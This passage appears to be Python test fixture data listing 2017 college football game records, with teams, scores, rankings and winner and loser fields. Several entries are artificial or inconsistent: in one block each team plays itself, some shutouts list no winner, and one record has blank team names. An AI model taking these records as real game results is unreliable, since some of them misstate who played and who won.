'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'},
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'New Mexico State',
'away_abbr': 'new-mexico-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'New Mexico State',
'losing_abbr': 'new-mexico-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Florida A&M',
'away_abbr': 'Florida A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Florida A&M',
'losing_abbr': 'Florida A&M'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Rhode Island',
'away_abbr': 'Rhode Island',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Rhode Island',
'losing_abbr': 'Rhode Island'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Austin Peay',
'away_abbr': 'Austin Peay',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Austin Peay',
'losing_abbr': 'Austin Peay'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Holy Cross',
'away_abbr': 'Holy Cross',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Holy Cross',
'losing_abbr': 'Holy Cross'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Tennessee State',
'away_abbr': 'Tennessee State',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tennessee State',
'winning_abbr': 'Tennessee State',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Sacramento State',
'away_abbr': 'Sacramento State',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Sacramento State',
'losing_abbr': 'Sacramento State'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Ohio State',
'away_abbr': 'ohio-state',
'away_score': 49,
'away_rank': 2,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Ohio State',
'winning_abbr': 'ohio-state',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Louisiana-Monroe',
'away_abbr': 'louisiana-monroe',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Louisiana-Monroe',
'losing_abbr': 'louisiana-monroe'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Buffalo',
'away_abbr': 'buffalo',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Buffalo',
'losing_abbr': 'buffalo'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Elon',
'away_abbr': 'Elon',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Elon',
'losing_abbr': 'Elon'},
{'boxscore': '2017-08-31-utah',
'away_name': 'North Dakota',
'away_abbr': 'North Dakota',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'North Dakota',
'losing_abbr': 'North Dakota'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Presbyterian',
'away_abbr': 'Presbyterian',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Presbyterian',
'losing_abbr': 'Presbyterian'}
],
'8-31-2017': [
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'Arizona State',
'away_abbr': 'arizona-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'Arizona State',
'losing_abbr': 'arizona-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Arkansas',
'away_abbr': 'arkansas',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Arkansas',
'losing_abbr': 'arkansas'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Central Michigan',
'away_abbr': 'central-michigan',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Central Michigan',
'losing_abbr': 'central-michigan'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Cincinnati',
'away_abbr': 'cincinnati',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Cincinnati',
'losing_abbr': 'cincinnati'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Connecticut',
'away_abbr': 'connecticut',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Connecticut',
'losing_abbr': 'connecticut'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Georgia State',
'away_abbr': 'georgia-state',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Georgia State',
'winning_abbr': 'georgia-state',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Idaho',
'away_abbr': 'idaho',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Idaho',
'losing_abbr': 'idaho'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Indiana',
'away_abbr': 'indiana',
'away_score': 49,
'away_rank': None,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Indiana',
'winning_abbr': 'indiana',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Memphis',
'away_abbr': 'memphis',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Memphis',
'losing_abbr': 'memphis'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Minnesota',
'away_abbr': 'minnesota',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Minnesota',
'losing_abbr': 'minnesota'},
{'boxscore': '2017-08-31-oklahoma-state',
'away_name': 'Oklahoma State',
'away_abbr': 'oklahoma-state',
'away_score': 24,
'away_rank': 10,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Oklahoma State',
'losing_abbr': 'oklahoma-state'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Toledo',
'away_abbr': 'toledo',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Toledo',
'losing_abbr': 'toledo'},
{'boxscore': '2017-08-31-utah',
'away_name': 'Utah',
'away_abbr': 'utah',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'Utah',
'losing_abbr': 'utah'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Wake Forest',
'away_abbr': 'wake-forest',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Wake Forest',
'losing_abbr': 'wake-forest'},
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
